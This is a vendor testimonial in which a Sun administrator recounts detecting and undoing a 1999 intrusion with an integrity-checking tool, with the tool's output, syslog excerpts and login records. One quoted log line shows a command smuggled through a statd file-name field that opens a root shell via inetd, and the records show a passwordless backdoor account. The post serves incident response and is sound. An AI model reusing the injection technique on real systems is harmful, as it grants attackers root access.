|
One morning I tried to log into our main Sun after a long weekend and found that my terminal was booby trapped. No matter what key I hit garbage came whizzing by on the monitor. Hopefully, being a little smarter than those other joes I did not do a "stop a". Instead I did a Telnet into the server from another computer and looked around. If it wasn't for your Cybersoft Cryptographic Integrity Tool, I would never have known that my /etc/rc* boot files were modified. If I did the reboot like that slug wanted me to, all the boot files that replaced mine would have taken effect. Instead I noted all the modified files in the CIT output listing, loaded a backup tape and put every thing back like it should have been. I must say that the CIT has really made my life administering my system easier. Besides saving my proverbial skin that day and using it other times to check for suspicious changes, I look at that output everyday to give me an indication of what is going on in the whole system. Great Tool.
I would say it took about 1 hour to fix and 10 minutes to figure out where tunaman (the cracker) came from. There were more files than in the /etc/rc* directories added or modified - see CIT output below.
The CIT output (abbreviated). All the changes I found :
Cryptographic Integrity Tool 2.5.1 run of Mon Aug 30 02:30:00 1999
New files:
/etc/shells
/usr/bin/xstat
/var/spool/calendar/callog.root.BRG
/var/spool/calendar/callog.root.LNA
/var/spool/calendar/callog.root.SPN
Modified files:
/etc/init.d/nfs.client
/etc/init.d/rpc
/etc/oshadow
/etc/rc0.d/K75nfs.client
/etc/rc0.d/K85rpc
/etc/rc1.d/K67rpc
/etc/rc1.d/K80nfs.client
/etc/rc2.d/S71rpc
/etc/rc2.d/S73nfs.client
/usr/bin/login
/usr/sbin/inetd
Errors in the messages file showing the "calendar" exploit used
Aug 29 09:35:12 mciunix inetd[121]: accept: Protocol error
Aug 29 17:03:25 mciunix statd[124]: attempt to create "/var/statmon/sm/; echo "pcserver
stream tcp nowait root /bin/sh sh -i" >>/tmp/bob ; /usr/sbin/inetd -s /tmp/bob &"
Aug 29 17:07:37 mciunix inetd[121]: /usr/openwin/bin/rpc.cmsd: Child Status Changed
Aug 29 17:08:07 mciunix inetd[9825]: ingreslock/tcp: bind: Address already in use
Aug 29 17:08:07 mciunix inetd[9825]: ingreslock/tcp: bind: Address already in use
Aug 29 17:18:07 mciunix inetd[9825]: ingreslock/tcp: bind: Address already in use
Aug 29 17:28:07 mciunix inetd[9825]: ingreslock/tcp: bind: Address already in use
Aug 29 17:38:07 mciunix inetd[9825]: ingreslock/tcp: bind: Address already in use
Aug 29 17:46:55 mciunix inetd[10414]: rusersd/rpc/datagram_v,circuit_v: tli_socket: No such
file or directory
Aug 29 18:09:44 mciunix inetd[10639]: rusersd/rpc/datagram_v,circuit_v: tli_socket: No such
file or directory
Aug 29 18:32:44 mciunix inetd[10639]: accept: Protocol error
Aug 29 18:32:44 mciunix inetd[10639]: accept: Protocol error
Aug 29 18:32:45 mciunix inetd[10639]: accept: Protocol error
Output from "last"
lastout:tunaman ftp ppp-206-170-224- Sun Aug 29 17:45 - 17:46 (00:00)
lastout:tunaman ftp ppp-206-170-224- Sun Aug 29 17:44 - 17:45 (00:01)
lastout:tunaman pts/1 ppp-206-170-224- Sun Aug 29 17:43 - 17:43 (00:00)
from who -a /var/adm/wtmp | grep tunaman
tunaman ppp-206-170-224-218.nhwd02.pacbell.net
tunaman ppp-206-170-224-218.nhwd02.pacbell.net
shadow file
shadow:tunaman::10832:0:0::::
/var/spool/calendar directory contents
callog.root callog.root.BRG callog.root.LNA callog.root.SPN
Copyright April 2001 by CyberSoft, Inc. All rights reserved. VFind is a registered trademark of CyberSoft, Inc. VSTK, VSTKP, VSTKCW, UAD and MvFilter are trademarks of CyberSoft, Inc.
Copyright © 2001 CyberSoft, Inc.
|
